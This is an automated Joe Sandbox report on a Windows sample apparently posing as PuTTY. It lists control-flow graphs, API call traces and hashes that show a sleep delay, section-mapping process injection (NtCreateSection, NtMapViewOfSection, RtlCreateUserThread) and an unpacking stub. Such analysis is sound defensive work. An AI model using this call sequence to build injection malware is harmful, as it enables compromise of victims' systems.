5223 84c3df 5222->5223 5224 84cbcf 5222->5224 5226 84c83f 5224->5226 5227 84c86a 5226->5227 5228 84c8b3 5227->5228 5229 84c87b VirtualAlloc 5227->5229 5228->5228 5229->5228 5311 940001 5312 940005 5311->5312 5313 94092b GetPEB 5312->5313 5314 940030 5313->5314 5315 94003c 7 API calls 5314->5315 5316 940038 5315->5316 5341 40189c 5342 4018ae 5341->5342 5343 4018da Sleep 5342->5343 5344 4013bf 7 API calls 5343->5344 5345 4018f5 5344->5345 5346 4014b5 7 API calls 5345->5346 5347 401906 5345->5347 5346->5347 5230 94003c 5231 940049 5230->5231 5243 940e0f SetErrorMode SetErrorMode 5231->5243 5236 940265 5237 9402ce VirtualProtect 5236->5237 5239 94030b 5237->5239 5238 940439 VirtualFree 5242 9404be LoadLibraryA 5238->5242 5239->5238 5241 9408c7 5242->5241 5244 940223 5243->5244 5245 940d90 5244->5245 5246 940dad 5245->5246 5247 940dbb GetPEB 5246->5247 5248 940238 VirtualAlloc 5246->5248 5247->5248 5248->5236 5374 402d2c 5376 402d35 5374->5376 5375 401891 15 API calls 5377 402ef2 5375->5377 5376->5375 5376->5377 5378 41ea75 5379 41ea80 5378->5379 5388 41e560 LoadLibraryA 5379->5388 5381 41eaa6 5389 41e420 GetModuleHandleW GetProcAddress VirtualProtect 5381->5389 5383 41eaab 5384 41e710 10 API calls 5383->5384 5385 41eab0 5384->5385 5386 41eaea InterlockedIncrement 5385->5386 5387 41eafe 5385->5387 5386->5385 5388->5381 5389->5383 5390 41e678 5392 41e680 5390->5392 5391 41e630 ResetEvent 5391->5392 5392->5391 5393 41e6bb GetNumaHighestNodeNumber GetComputerNameA 5392->5393 5394 41e6db 5392->5394 5393->5392

                                              Executed Functions

                                              Function 0041E7A0 Relevance: 34.8, APIs: 23, Instructions: 305timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 41e7a0-41e7d0 1 41e7d3-41e7d8 0->1 2 41e7e0-41e7e6 1->2 3 41e7da 1->3 4 41e7f4-41e7fa 2->4 5 41e7e8-41e7ee 2->5 3->2 4->1 6 41e7fc-41e80a 4->6 5->4 7 41e810-41e816 6->7 8 41e822-41e828 7->8 9 41e818-41e81d 7->9 10 41e834-41e83b 8->10 11 41e82a-41e82e 8->11 9->8 10->7 12 41e83d-41e84b 10->12 11->10 14 41e850-41e88b GetDateFormatA 12->14 17 41e896-41e89f 14->17 18 41e88d-41e894 14->18 19 41e983-41e98a 17->19 20 41e8a5-41e980 FoldStringA BuildCommDCBA GetTimeFormatA SetProcessPriorityBoost SetFileAttributesA UnregisterWaitEx SetLocaleInfoA 17->20 18->14 18->17 21 41e990-41ea37 InterlockedDecrement GetCommandLineA SetErrorMode GetAtomNameA SearchPathA SetDefaultCommConfigA GetConsoleAliasW GetVersionExA DisconnectNamedPipe GetEnvironmentStringsW WriteConsoleOutputW GetModuleHandleA 19->21 22 41ea4b-41ea6b LocalAlloc 19->22 20->19 32 41ea42-41ea48 21->32 33 41ea39-41ea3c OpenFileMappingW 21->33 23 41eaa1-41eaa6 call 41e560 call 41e420 22->23 24 41ea6d-41ea73 22->24 38 41eaab-41eabe call 41e710 23->38 28 41ea80-41ea90 24->28 30 41ea92 28->30 31 41ea9c-41ea9f 28->31 30->31 31->23 31->28 32->22 33->32 42 41eac0-41eac7 38->42 43 41ead4-41eada 42->43 44 41eac9-41ead0 42->44 46 41eae1-41eae8 43->46 47 41eadc call 41e410 43->47 44->43 50 41eaf5-41eafc 46->50 51 41eaea-41eaef InterlockedIncrement 46->51 47->46 50->42 53 41eafe-41eb0e 50->53 51->50 54 41eb10-41eb20 53->54 56 41eb22-41eb3c 54->56 57 41eb3f-41eb42 54->57 56->57 57->54 59 41eb44-41eb50 57->59 60 41eb52-41eb66 59->60 66 41eb72-41eb79 60->66 67 41eb68-41eb70 60->67 66->60 68 41eb7b-41eb8f 66->68 67->66 67->68
                                              APIs
                                              • GetDateFormatA.KERNELBASE(00000000,00000000,?,00000000,?,00000000), ref: 0041E87F
                                              • FoldStringA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0041E8BA
                                              • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041E8C2
                                              • GetTimeFormatA.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 0041E8F3
                                              • SetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041E8FB
                                              • SetFileAttributesA.KERNEL32(00423370,00000000), ref: 0041E907
                                              • UnregisterWaitEx.KERNEL32(?,00000000), ref: 0041E917
                                              • SetLocaleInfoA.KERNEL32(00000000,00000000,00423380), ref: 0041E924
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: Format$AttributesBoostBuildCommDateFileFoldInfoLocalePriorityProcessStringTimeUnregisterWait
                                              • String ID:
                                              • API String ID: 3960956766-0
                                              • Opcode ID: 914c2a7e43a7881f3aa375db9e339a1e29a6939f754bf8832aeec207d45dfe88
                                              • Instruction ID: 6ae51a12dd7b4aebb8f82212809d29e946f68f2589e94ec055893a89d6f8ae5b
                                              • Opcode Fuzzy Hash: 914c2a7e43a7881f3aa375db9e339a1e29a6939f754bf8832aeec207d45dfe88
                                              • Instruction Fuzzy Hash: 20A1C0B5904200AFD320EF61ED84DAB77ADFB88304F40493EFA4692261DB789C45CB6D
                                              Function 004013BF Relevance: 10.8, APIs: 7, Instructions: 299COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 155 4013bf-4013c8 156 4013d0-4013d6 155->156 157 4013da 155->157 158 4013dd-401422 call 40113b 156->158 157->156 157->158 168 401424-401440 158->168 169 401496-40149e 158->169 171 401442 168->171 172 4014b7-4014d5 168->172 170 4014a0-4014b2 169->170 174 401492-401494 171->174 175 401444-401446 171->175 176 4014c6-4014e9 172->176 175->170 177 401448-401461 175->177 183 4014e0 176->183 181 401463-401468 177->181 182 4014c4 177->182 184 4014e5-4014f8 181->184 185 40146a 181->185 182->176 183->184 192 4014f1-4014f4 184->192 193 4014fb-40150e call 40113b 184->193 187 40146c-401476 185->187 188 4014de 185->188 189 401414-401422 187->189 190 401478-40147c 187->190 188->183 189->168 189->169 192->193 196 401510 193->196 197 401513-401518 193->197 196->197 199 40183d-401845 197->199 200 40151e-40152f 197->200 199->197 203 40184a 199->203 204 401535-40155e 200->204 205 40183b 200->205 206 401861 203->206 207 401852-40185d 203->207 204->205 213 401564-40157b NtDuplicateObject 204->213 205->203 206->207 208 401864-40188e call 40113b 206->208 207->208 213->205 215 401581-4015a5 NtCreateSection 213->215 217 401601-401627 NtCreateSection 215->217 218 4015a7-4015c8 NtMapViewOfSection 215->218 217->205 221 40162d-401631 217->221 218->217 220 4015ca-4015e6 NtMapViewOfSection 218->220 220->217 224 4015e8-4015fe 220->224 221->205 225 401637-401658 NtMapViewOfSection 221->225 224->217 225->205 227 40165e-40167a NtMapViewOfSection 225->227 227->205 229 401680 call 401685 227->229
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                              • Instruction ID: b303ee40ce3cd715bffe5459f1355022e0f5cf8d3c2eb96fe6471530370b2b0e
                                              • Opcode Fuzzy Hash: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                              • Instruction Fuzzy Hash: 3BA10872A04204FBEB219F91CC45EEB7BB8EF81710F24452BF902BA1F1D6749902DB65
                                              Function 004014B5 Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 231 4014b5-4014f8 240 4014f1-4014f4 231->240 241 4014fb-40150e call 40113b 231->241 240->241 244 401510 241->244 245 401513-401518 241->245 244->245 247 40183d-401845 245->247 248 40151e-40152f 245->248 247->245 251 40184a 247->251 252 401535-40155e 248->252 253 40183b 248->253 254 401861 251->254 255 401852-40185d 251->255 252->253 261 401564-40157b NtDuplicateObject 252->261 253->251 254->255 256 401864-40188e call 40113b 254->256 255->256 261->253 263 401581-4015a5 NtCreateSection 261->263 265 401601-401627 NtCreateSection 263->265 266 4015a7-4015c8 NtMapViewOfSection 263->266 265->253 269 40162d-401631 265->269 266->265 268 4015ca-4015e6 NtMapViewOfSection 266->268 268->265 272 4015e8-4015fe 268->272 269->253 273 401637-401658 NtMapViewOfSection 269->273 272->265 273->253 275 40165e-40167a NtMapViewOfSection 273->275 275->253 277 401680 call 401685 275->277
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                              • Instruction ID: 19a1d6b0ff796e10bf8f41dee95350edbff68fa9ff5f9bfea876b5d94b6971b3
                                              • Opcode Fuzzy Hash: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                              • Instruction Fuzzy Hash: C9513BB1900245BFEB209F91CC48FAB7BB8FF85B10F14412AFA11BA2E5D6759941CB64
                                              Function 004014D3 Relevance: 10.7, APIs: 7, Instructions: 169nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 279 4014d3-4014eb 281 4014d8-4014f8 279->281 282 4014ed-4014f4 279->282 284 4014fb-40150e call 40113b 281->284 293 4014f1-4014f4 281->293 282->284 290 401510 284->290 291 401513-401518 284->291 290->291 295 40183d-401845 291->295 296 40151e-40152f 291->296 293->284 295->291 299 40184a 295->299 300 401535-40155e 296->300 301 40183b 296->301 302 401861 299->302 303 401852-40185d 299->303 300->301 309 401564-40157b NtDuplicateObject 300->309 301->299 302->303 304 401864-40188e call 40113b 302->304 303->304 309->301 311 401581-4015a5 NtCreateSection 309->311 313 401601-401627 NtCreateSection 311->313 314 4015a7-4015c8 NtMapViewOfSection 311->314 313->301 317 40162d-401631 313->317 314->313 316 4015ca-4015e6 NtMapViewOfSection 314->316 316->313 320 4015e8-4015fe 316->320 317->301 321 401637-401658 NtMapViewOfSection 317->321 320->313 321->301 323 40165e-40167a NtMapViewOfSection 321->323 323->301 325 401680 call 401685 323->325
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectView
                                              • String ID:
                                              • API String ID: 1652636561-0
                                              • Opcode ID: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                              • Instruction ID: 8103355e2e942ff69e8c14b284ac6daeef9955d1bae1450e847efa7766c746d9
                                              • Opcode Fuzzy Hash: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                              • Instruction Fuzzy Hash: 245127B1900245BBEF209F91CC48FABBBB8EF86B00F144159FA11BA2A5D6719941CB24
                                              Function 004014F7 Relevance: 10.7, APIs: 7, Instructions: 161nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 327 4014f7-40150e call 40113b 331 401510 327->331 332 401513-401518 327->332 331->332 334 40183d-401845 332->334 335 40151e-40152f 332->335 334->332 338 40184a 334->338 339 401535-40155e 335->339 340 40183b 335->340 341 401861 338->341 342 401852-40185d 338->342 339->340 348 401564-40157b NtDuplicateObject 339->348 340->338 341->342 343 401864-40188e call 40113b 341->343 342->343 348->340 350 401581-4015a5 NtCreateSection 348->350 352 401601-401627 NtCreateSection 350->352 353 4015a7-4015c8 NtMapViewOfSection 350->353 352->340 356 40162d-401631 352->356 353->352 355 4015ca-4015e6 NtMapViewOfSection 353->355 355->352 359 4015e8-4015fe 355->359 356->340 360 401637-401658 NtMapViewOfSection 356->360 359->352 360->340 362 40165e-40167a NtMapViewOfSection 360->362 362->340 364 401680 call 401685 362->364
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                              • Instruction ID: 2227e086d9928dda04f460d80950503c889386f6503bf0ca9f5f85cfbacfc3af
                                              • Opcode Fuzzy Hash: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                              • Instruction Fuzzy Hash: 8B5107B1900249BFEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D6719945CB24
                                              Function 00402F8F Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 367 402f8f-402fb3 368 4030d2-4030d7 367->368 369 402fb9-402fd1 367->369 369->368 370 402fd7-402fe8 369->370 371 402fea-402ff3 370->371 372 402ff8-403006 371->372 372->372 373 403008-40300f 372->373 374 403031-403038 373->374 375 403011-403030 373->375 376 40305a-40305d 374->376 377 40303a-403059 374->377 375->374 378 403066 376->378 379 40305f-403062 376->379 377->376 378->371 381 403068-40306d 378->381 379->378 380 403064 379->380 380->381 381->368 382 40306f-403072 381->382 382->368 383 403074-4030cf RtlCreateUserThread NtTerminateProcess 382->383 383->368
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateProcessTerminateThreadUser
                                              • String ID:
                                              • API String ID: 1921587553-0
                                              • Opcode ID: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                              • Instruction ID: aa2530698c6aa4494656ae1f9c01ee64b6dc24c6198c14284b052c109098bfb9
                                              • Opcode Fuzzy Hash: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                              • Instruction Fuzzy Hash: 1F415832618E0C4FD778EE6CA88966377D5E794351B56437AE809D3388EE30DC5183C5
                                              Function 0084CB80 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 384 84cb80-84cb99 385 84cb9b-84cb9d 384->385 386 84cba4-84cbb0 CreateToolhelp32Snapshot 385->386 387 84cb9f 385->387 388 84cbc0-84cbcd Module32First 386->388 389 84cbb2-84cbb8 386->389 387->386 390 84cbd6-84cbde 388->390 391 84cbcf-84cbd0 call 84c83f 388->391 389->388 396 84cbba-84cbbe 389->396 394 84cbd5 391->394 394->390 396->385 396->388
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0084CBA8
                                              • Module32First.KERNEL32(00000000,00000224), ref: 0084CBC8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177166657.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Offset: 00849000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_849000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: f3054302d36f515f05a4cafb62f90254cb4fd7f3b015d9c319aa3802630dbcf8
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction Fuzzy Hash: 1BF06D32601B186FD7603AB9A88EA6A76ECFF49734F100969E642D24C0DA70E8458A61
                                              Function 0094003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 70 94003c-940047 71 94004c-940263 call 940a3f call 940e0f call 940d90 VirtualAlloc 70->71 72 940049 70->72 87 940265-940289 call 940a69 71->87 88 94028b-940292 71->88 72->71 93 9402ce-9403c2 VirtualProtect call 940cce call 940ce7 87->93 90 9402a1-9402b0 88->90 92 9402b2-9402cc 90->92 90->93 92->90 99 9403d1-9403e0 93->99 100 9403e2-940437 call 940ce7 99->100 101 940439-9404b8 VirtualFree 99->101 100->99 103 9405f4-9405fe 101->103 104 9404be-9404cd 101->104 105 940604-94060d 103->105 106 94077f-940789 103->106 108 9404d3-9404dd 104->108 105->106 109 940613-940637 105->109 112 9407a6-9407b0 106->112 113 94078b-9407a3 106->113 108->103 111 9404e3-940505 108->111 116 94063e-940648 109->116 120 940517-940520 111->120 121 940507-940515 111->121 114 9407b6-9407cb 112->114 115 94086e-9408be LoadLibraryA 112->115 113->112 117 9407d2-9407d5 114->117 125 9408c7-9408f9 115->125 116->106 118 94064e-94065a 116->118 122 940824-940833 117->122 123 9407d7-9407e0 117->123 118->106 124 940660-94066a 118->124 126 940526-940547 120->126 121->126 130 940839-94083c 122->130 127 9407e4-940822 123->127 128 9407e2 123->128 129 94067a-940689 124->129 131 940902-94091d 125->131 132 9408fb-940901 125->132 133 94054d-940550 126->133 127->117 128->122 134 940750-94077a 129->134 135 94068f-9406b2 129->135 130->115 136 94083e-940847 130->136 132->131 138 940556-94056b 133->138 139 9405e0-9405ef 133->139 134->116 140 9406b4-9406ed 135->140 141 9406ef-9406fc 135->141 142 940849 136->142 143 94084b-94086c 136->143 144 94056d 138->144 145 94056f-94057a 138->145 139->108 140->141 146 9406fe-940748 141->146 147 94074b 141->147 142->115 143->130 144->139 148 94057c-940599 145->148 149 94059b-9405bb 145->149 146->147 147->129 154 9405bd-9405db 148->154 149->154 154->133
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0094024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_940000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: 0f2563c088c55e369c8b99a75913258639d7b91ed0990f4b75a4850b41703535
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: F1526774A00229DFDB64CF68C984BA8BBB1BF49304F1480D9E94DAB351DB34AE85DF14
                                              Function 0041E420 Relevance: 4.6, APIs: 3, Instructions: 60librarymemoryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 366 41e420-41e55e GetModuleHandleW GetProcAddress VirtualProtect
                                              APIs
                                              • GetModuleHandleW.KERNEL32(007FBE70), ref: 0041E4FC
                                              • GetProcAddress.KERNEL32(00000000,00428568), ref: 0041E539
                                              • VirtualProtect.KERNELBASE(007FBCB4,007FBE6C,00000040,?), ref: 0041E559
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProcProtectVirtual
                                              • String ID:
                                              • API String ID: 2099061454-0
                                              • Opcode ID: 5f792d3185b1dfe27c01431423dd3fc6cfa42d126e08d48e723e3642774d761e
                                              • Instruction ID: 73f69d7917680131017885dec632b363507af7a99e12a31d1a756d0ae7194df9
                                              • Opcode Fuzzy Hash: 5f792d3185b1dfe27c01431423dd3fc6cfa42d126e08d48e723e3642774d761e
                                              • Instruction Fuzzy Hash: D331E2107197C0EAE311DB74FC0476A3BA2AB65744F94906CD284873B1DBFE4596C72E
                                              Function 00940E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 397 940e0f-940e24 SetErrorMode * 2 398 940e26 397->398 399 940e2b-940e2c 397->399 398->399
                                              APIs
                                              • SetErrorMode.KERNELBASE(00000400,?,?,00940223,?,?), ref: 00940E19
                                              • SetErrorMode.KERNELBASE(00000000,?,?,00940223,?,?), ref: 00940E1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_940000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: 263bd457605f750de3bf08e678698831de7a69c0df499e67b04a708b532cfd21
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: 82D01232245228B7DB002A94DC09BCEBB1CDF09BA2F008421FB0DE9080CBB09A4046EA
                                              Function 0041E560 Relevance: 1.5, APIs: 1, Instructions: 17libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 400 41e560-41e5bb LoadLibraryA
                                              APIs
                                              • LoadLibraryA.KERNELBASE(00428568,0041EAA6), ref: 0041E5B5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: a2247281a0317d9ab3f27a11f04892dfecf0f6f02230e8de71191773789cf042
                                              • Instruction ID: 37f511d326cec085d92eed1722e052eb53f2ff336d789c620464cf2e2f778e48
                                              • Opcode Fuzzy Hash: a2247281a0317d9ab3f27a11f04892dfecf0f6f02230e8de71191773789cf042
                                              • Instruction Fuzzy Hash: 41F02E0574F2E0ECE722C77869097483F511722688FC840ED908016663CAAA02DBD73E
                                              Function 00401891 Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                              • Instruction ID: 625976beb622557468fde4da7c406050b614696d38d370b0d4d52ea32007e278
                                              • Opcode Fuzzy Hash: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                              • Instruction Fuzzy Hash: 2C0192B260C204EBEB002991CC91EBA32299B04350F308133B603790F1D57C8753B36F
                                              Function 004018A9 Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                              • Instruction ID: 01e10882b1c060c9bcf7afaa20a424b8b06e3eaca9db3e31c9d827ddeb5dfa52
                                              • Opcode Fuzzy Hash: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                              • Instruction Fuzzy Hash: 620178B260C204EBEB042A91CC91EBE2225AB08320F308133B603790F1D67C8753B72F
                                              Function 0040189C Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                              • Instruction ID: 091d8ab5f34d30388949969244c388a12b20eca364eb9837eec97541f3976fe9
                                              • Opcode Fuzzy Hash: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                              • Instruction Fuzzy Hash: 46015AB360C244EBEB016A90C8A1EAA37659B48310F308577B643790F1D67C8753A72F
